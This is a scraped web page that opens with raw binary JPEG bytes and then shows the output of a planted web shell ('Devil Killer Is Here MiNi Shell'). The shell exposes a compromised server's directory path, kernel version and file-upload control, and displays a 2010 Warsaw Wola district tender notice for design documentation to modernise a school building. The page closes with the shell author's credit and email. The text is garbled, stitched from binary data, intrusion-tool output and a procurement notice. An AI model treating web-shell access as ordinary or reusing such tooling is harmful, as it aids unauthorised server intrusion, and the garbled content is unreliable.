JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100303/47131-N-2010.html

<p class="kh_header"><b>Warszawa: Opracowanie dokumentacji projektowo - kosztorysowej na modernizację budynku Państwowego Studium Stenotypii i Języków Obcych przy ul. Ogrodowej 16 w Warszawie (numer sprawy 33/ZP/10)</b><br>
<b>Numer ogłoszenia: 47131 - 2010; data zamieszczenia: 03.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa, Dzielnica Wola , Al. Solidarności 90, 01-003 Warszawa, woj. mazowieckie, tel. 022 5048588, faks 022 5048592.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wola.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej na modernizację budynku Państwowego Studium Stenotypii i Języków Obcych przy ul. Ogrodowej 16 w Warszawie (numer sprawy 33/ZP/10).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia.
Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej na modernizację budynku Państwowego Studium Stenotypii i Języków Obcych przy ul. Ogrodowej 16 w Warszawie.   
Szczegółowy opis przedmiotu zamówienia Informacje ogólne o obiekcie:
1) lokalizacja obiektu na działce nr 35 z obrębu nr 6-01-02 jednostka ewidencyjna 
146518;
2) charakterystyka obiektu to: czterokondygnacyjny podpiwniczony budynek szkoły z 	salą gimnastyczną o powierzchni użytkowej ca  2736m2 o kubaturze ca 12881 m3;
3) konstrukcja budynku to:
-  mury nośne z cegły pełnej na zaprawie cementowo - wapiennej,
-  stropy między kondygnacjami typu DMS, 
-  płyty żelbetowe (nad schodami), monolityczne zbrojone krzyżowo,
- dach (nad salą gimnastyczną) z płyt prefabrykowanych na belkach żelbetowych, 	żebrowany, monolityczny,
-  pokrycie dachów wykonane z papy termozgrzewalnej z posypką mineralną,
-  schody żelbetowe obłożone lastrico,
-  ściany wewnętrzne działowe z cegły pełnej i dziurawki, otynkowane, częściowo z 	płyt pilśniowych,
- 	tynki cementowo - wapienne, malowane farbami emulsyjnymi i olejnymi - 	lamperie,
-  stolarka okienna drewniana częściowo wymieniona na PCV,
-  stolarka drzwiowa drewniana częściowo wymieniona na aluminiową,
4) źródła ciepła i instalacja centralnego ogrzewania to wysoko parometrowa sieć cieplna 		należąca do Stołecznego Przedsiębiorstwa Energetyki Cieplnej Warszawa S.A. 		(Instalacja ciepłej wody użytkowej oraz instalacja centralnego ogrzewania nie została 		zmodernizowana),
5) wentylacja w budynku jest grawitacyjna, wyciągowa poprzez kratki wywiewne w 		pomieszczeniach,
6)  budynek wyposażony jest w pozostałe instalacje:
     - zimnej wody,
     - kanalizacyjną,
     - elektryczną,
     - gazową (wyłącznie lokale mieszkalne),
     - odgromową,
     - pożarową,
Przedmiot zamówienia obejmuje: 
Wykonanie pełnej dokumentacji budowlano - wykonawczej wraz z uzyskaniem wymaganych przepisami szczegółowych opinii, uzgodnień, zatwierdzeń itp. niezbędnych do uzyskania pozwolenia na budowę i prawidłowej realizacji przedmiotu zamówienia.
Dokumentacja projektowo - kosztorysowa powinna zawierać opracowania w następujących branżach: 
1)konstrukcyjno - budowlanej;
2)cieplnej;
3)wentylacyjnej;
4)gazowej;
5)elektrycznej i elektroenergetycznej;
6)wodociągowej i kanalizacyjnej;
 	Dokumentację projektową należy opracować w następującym zakresie:
1)opracowanie audytu energetycznego;
2)inwentaryzację aktualnego stanu;
3)ocieplenie ścian zewnętrznych i fundamentów budynku szkoły i Sali gimnastycznej;
4)wykonanie elewacji budynku szkoły i Sali gimnastycznej wraz z koloryzacją;
5)ocieplenie stropodachu budynku szkoły i Sali gimnastycznej;
6)remont pokrycia dachu z wymianą obróbek blacharskich;
7)przy ociepleniu należy zastosować rozwiązania systemowe;
8)wymiana stolarki drzwiowej i okiennej;
9)remont sali gimnastycznej i pomieszczeń szkolnych z wyminą tynków i posadzek;
10) wymiana instalacji co (nowe grzejniki, rurociągi, zawory termostatyczne itp.);
11) wykonanie instalacji ciepłej wody;
12) wykonanie przyłącza sieci cieplnej;
13) budowa węzła cieplnego w zakresie technologii i automatyki, robót budowlanych i 	 elektrycznych;
14) wykonanie wentylacji mechanicznej;
15) wymiana instalacji zimnej wody i kanalizacji;
16) wymiana instalacji przeciwpożarowej;
17) wymiana instalacji odgromowej;
18) wymiana instalacji elektrycznej w tym wymiana instalacji oświetleniowej, instalacji 	 gniazd wtykowych i siłowych, tablice główne i rozdzielnie, instalacja komputerowa z 	 rozprowadzeniem Internetu;
19) wykonanie instalacji monitoringu i domofonowej;
20) przystosowanie budynku dla osób niepełnosprawnych;
Dokumentacja projektowo - kosztorysowa na Modernizację budynku PSSiJO przy       ul. Ogrodowej 16 w Warszawie powinna być sporządzona w następującej ilości egzemplarzy na papierze:
1)audyt energetyczny - 2 egzemplarze;
2)inwentaryzację istniejącego stanu niezbędną do wykonania projektu budowlano - 	wykonawczego - 5 egzemplarzy;
3)projekt budowlano - wykonawczy obejmujący cały zakres robót w branżach: 	konstrukcyjno - budowlanej, cieplnej, wentylacyjnej, gazowej, elektrycznej                   	i elektroenergetycznej, wodociągowej i kanalizacyjnej;- 5 egzemplarzy;
4)przedmiary robót dla wszystkich branż - 6 egzemplarzy;
5)Specyfikacje Techniczne Wykonania i Odbioru Robót (STWiOR) dla wszystkich 	branż - 6 egzemplarzy;
6)kosztorysy inwestorskie - 2 egzemplarze;
7)informację dotyczącą bezpieczeństwa i ochrony zdrowia - 6 egzemplarzy;
8)inne opracowania niezbędne do realizacji przedmiotu umowy wraz z niezbędnymi 	uzgodnieniami i opiniami - 6 egzemplarzy.
	Dokumentacja projektowo - kosztorysowa na Modernizację budynku PSSiJO przy       	ul. Ogrodowej 16 w Warszawie powinna być sporządzona w formie elektronicznej w 	dwóch egzemplarzach na nośniku elektronicznym CD-R tj:
1) dokumentacja projektowa, przedmiary robót - w formacie PDF;
2) kosztorys inwestorski - w programie Norma;
3) informacja dotycząca bezpieczeństwa i ochrony zdrowia, wniosek o wydanie decyzji   	o środowiskowych uwarunkowaniach na realizację przedsięwzięcia wraz                      	z  załącznikami oraz STWiOR - w formacie PDF,
4) wszystkie uzgodnienia do projektu budowlanego należy dostarczyć w 2 	oryginalnych 	egzemplarzach (egz. Inwestora nr 1 i 2). Pozostałe egzemplarze 	dokumentacji 	projektowej muszą zawierać kolorowe odbitki ksero.
Inne wymagania dotyczące wykonania dokumentacji projektowo - kosztorysowej:
      1) kosztorys inwestorski powinien być wykonany zgodnie z rozporządzeniem Ministra 			Infrastruktury z dnia 18.05.2004r. (Dz. U. Nr 130 poz. 1389);
2)przedmiar robót należy wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z 	dnia 02.09.2004r. (Dz. U. Nr 202 poz. 2072);
3)informacja dotycząca bezpieczeństwa i ochrony zdrowia należy wykonać zgodnie z 	rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003r. (Dz. U. Nr 120 poz. 	1126);
4)projekt należy wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 	02.09.2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, 	specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu 	funkcjonalno - użytkowego (Dz. U. Nr 202 poz. 2072);
5)projekty należy wykonać zgodnie z Polskimi Normami oraz obowiązującymi 	wytycznymi branżowymi. bieżąca współpraca z Wydziałem Infrastruktury Urzędu 	Dzielnicy Wola w trakcie opracowania dokumentacji;
6)w dokumentacji projektowo - kosztorysowej należy ująć średni standard cen 	materiałów;
7)projekt budowlano - wykonawczy nie może zawierać materiałów wskazujących 	producenta, a jedynie należy podać charakterystyczne parametry tj.  rodzaj materiału;
8)zapisy w projekcie powinny dopuszczać zastosowanie materiałów różnych 	producentów;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 50%  wartości zamówienia podstawowego, które będą polegać na powtórzeniu tego samego rodzaju zamówień i będą zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości: 2.000,00 zł. (słownie: dwa tysiące złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie warunku o którym mowa w części IV.1 pkt 1 ppkt 2) SIWZ zamawiający uzna 	wykazanie, iż wykonawca w okresie ostatnich trzech lat przed upływem terminu składnia 	ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, wykonał co 	najmniej jedną usługę polegająca na opracowaniu dokumentacji projektowo - 	kosztorysowej na modernizację budynku w następujących branżach: konstrukcyjno - 	budowlanej, cieplnej, wentylacyjnej, gazowej, elektrycznej i elektroenergetycznej, 	wodociągowej i kanalizacyjnej,
Spełnienie tego warunku zamawiający będzie oceniał na podstawie dokumentów                   i oświadczeń, o których mowa w części V.1. pkt 4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie warunku o którym mowa w części IV.1. pkt 1 ppkt 3) SIWZ zamawiający 	uzna wykazanie, iż wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tj. 	posiadającymi uprawnienia budowlane do projektowania w następujących specjalnościach:
a)  konstrukcyjno - budowlanej bez ograniczeń;
b) instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, 	cieplnych, wentylacyjnych i gazowych - bez ograniczeń;
c)instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energoelektrycznych 	- bez ograniczeń;
Spełnienie tego warunku zamawiający będzie oceniał na podstawie dokumentów                   i oświadczeń, o których mowa w części V.1. pkt 5 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie warunku o którym mowa w części IV.1. pkt 1 ppkt 4) SIWZ zamawiający 	uzna wykazanie, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w  	zakresie prowadzonej działalności na sumę w wysokości co najmniej 100.000,00 zł. 
Spełnienie tego warunku oceniane będzie na podstawie dokumentów i oświadczeń o których mowa w części V.1. pkt 6 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W przypadku gdy wykonawcę reprezentuje pełnomocnik - pełnomocnictwo do podpisania oferty, określające jego zakres i podpisane przez osoby upoważnione do reprezentowania wykonawcy wraz z dokumentem, z którego wynika sposób reprezentacji wykonawcy (np. odpis z właściwego rejestru).
2.W przypadku gdy ofertę składają wykonawcy występujący wspólnie wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 ustawy Prawo zamówień publicznych, podpisane przez osoby upoważnione do składania oświadczeń woli, każdego z wykonawców wspólnie ubiegając się o udzielenie zamówienia.
3.Potwierdzenie wniesienia wadium, jeżeli wadium zostało wniesione w innej formie niż pieniądz. Oryginał dokumentu w przypadku wniesienia wadium w formie niepieniężnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wola.waw.pl/page/index.php?str=422<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Stołeczne Warszawa Dzielnica Wola, ul. Al. Solidarności 90, 01-003 Warszawa w pokoju nr 220 Wydział Zamówień Publicznych dla Dzielnicy Wola lub za zaliczeniem pocztowym (cena 4,35 zł).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2010 godzina 12:00, miejsce: Miasto Stołeczne Warszawa Dzielnica Wola, ul. Al. Solidarności 90, 01-003 Warszawa w pokoju nr 220 Wydział Zamówień Publicznych dla Dzielnicy Wola.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com